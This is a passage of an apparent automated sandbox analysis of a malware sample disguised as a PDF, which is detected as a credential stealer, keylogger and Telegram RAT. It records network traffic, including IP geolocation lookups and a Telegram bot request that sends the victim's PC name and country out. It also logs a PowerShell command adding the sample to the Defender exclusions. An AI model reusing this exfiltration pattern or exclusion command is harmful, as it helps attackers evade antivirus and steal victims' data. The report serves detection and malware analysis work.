                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409603
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Eye9L%2FQCcS%2FAQpGWcIv05f%2FEblpBSQZzfi4o3mymB65Q9H67cpXJ%2BQuLGZlB4ayCglRq2q2%2B7YNp%2FG%2BccNKwkK2co9EcC5iFnHvX1lWHLzijIfJLEAmhcO%2Fg5DkXSYtHF41lCEe"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a47bb501885-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=568&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1909744&cwnd=193&unsent_bytes=0&cid=83887aa349bbcded&ts=454&x=0"
                                                                                                      2024-12-17 07:33:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749714172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:33:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:33:57 UTC876INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:57 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409606
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=htqgcChm4%2F6SlMmQ5qnIVL%2FR51ggXgNy1suzapG2DQPnr0A1d1kHXIpfMHpbWjE85wKEBX%2BjVfjAYKzZHw0skFTvPelt8IscxggwTY0Hjh5wpO2TwZJ2iljKhNVXx1xc9NwytUfD"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a59de5c0f6b-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1457&min_rtt=1450&rtt_var=557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1938911&cwnd=210&unsent_bytes=0&cid=c11990eb21b8391c&ts=450&x=0"
                                                                                                      2024-12-17 07:33:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.749716172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:00 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:34:00 UTC886INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:00 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409609
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PikA4I6auE%2Fx74oxsj7bSmBgTlcLXqA%2BVdma%2FfQ%2FOwILy3wgPtw%2BhFPS2G%2BIdgd7TjbLakkDL%2Ff5R4nmssaDgJ0BNyWRru43JtN6rToDKMjhkRvlsEiwSrRggjGbUTmHXW%2F9jS5u"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a6bdc534406-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1552&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1827284&cwnd=186&unsent_bytes=0&cid=815026d24e3a4198&ts=450&x=0"
                                                                                                      2024-12-17 07:34:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.749718172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:02 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-12-17 07:34:03 UTC874INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:03 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409612
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ9pXpb%2BcRSSOohvr4NFCFYhoyYnbLJw8ELaYfmTtjF0A65qz6gpLdHfmeO9RrDQPQYed1RmrdtlIxEe9kVHcg5dMEclGG%2BahhPUUMDhlgrFwMjA1r2XdijBnpP5zEDaEv43DxQp"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a7e5a897d02-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=1999&rtt_var=811&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1300089&cwnd=230&unsent_bytes=0&cid=74d5560dc9480bc0&ts=451&x=0"
                                                                                                      2024-12-17 07:34:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.749723172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:05 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:34:06 UTC878INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:06 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409615
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2iFU7L7fHO6AQkjOlMWEjplHLeJ0PJZhy%2FjZtyazQ22OrbggP8WpwufrylMjRYyf6j%2FSc46kyDQMYaAqhNHD%2FjnHtcmsas6oYeQ0HHX2%2ByDK5F7uOCvxvCfkE9Lpz1Ge4ksdhPY"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a92a93b42d1-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1705&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1666666&cwnd=194&unsent_bytes=0&cid=f32f40dbdc124d1c&ts=828&x=0"
                                                                                                      2024-12-17 07:34:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.749727172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:34:09 UTC876INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:09 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409618
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTxNiZaHEUXqeu4nCkyO%2F2DoCskGWYSIVLprypkQQa8T6oXlke2FCsbjyEBZ4s%2F7FQO%2BymzBtDkGefwBeoagw4CH3OR1qR3vEDbUXssJwkUyavJt4t7yZ5B9YRiGnygViJSYTiYA"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353aa50cd00f9b-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1649&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1756919&cwnd=217&unsent_bytes=0&cid=87107b4ca108d9bb&ts=451&x=0"
                                                                                                      2024-12-17 07:34:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.749729172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:34:12 UTC880INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:12 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409621
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqiruQ%2BVwDyc4qyLbR0cHWB00hq1o5IV4u611XU4h5FoNqO%2BMzVFOw7DfpFCNt7MNZKHj4%2FVkNv%2BmGofUOl9cj7swWjo30LS4f153vhyhO3pETTljLonrzfGGp%2F2I5kkbt9Ql3xk"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353ab7ade7430f-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1599&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1826141&cwnd=214&unsent_bytes=0&cid=3fc07d45062eda64&ts=449&x=0"
                                                                                                      2024-12-17 07:34:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.749731172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:34:16 UTC879INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:16 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409625
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mclqdfPezVSG7ErPRw7Stq%2FWYDhMNTXTa592r5Vj2aB9Ig%2FJMjfUKYNWp5LnI0ombgq1m3ATDLYUTOIbXskye3dUlQ07g2gQL50%2BOwkbv1ASNCPJcBOsFWq3vcYBNKiK8fu%2FvdiX"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353ace0a5e42d5-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=9602&min_rtt=1766&rtt_var=5473&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1653454&cwnd=218&unsent_bytes=0&cid=d4fac11b2c811c5c&ts=452&x=0"
                                                                                                      2024-12-17 07:34:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.749733149.154.167.2204436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:34:18 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2018/12/2024%20/%2003:49:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:34:18 UTC344INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Tue, 17 Dec 2024 07:34:18 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-12-17 07:34:18 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:02:33:44
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                                                                                                      Imagebase:0xb40000
                                                                                                      File size:907'264 bytes
                                                                                                      MD5 hash:68DFD91FCE9AD3D728A7C25716990EDD
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:02:33:46
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                                                                                                      Imagebase:0x1c0000
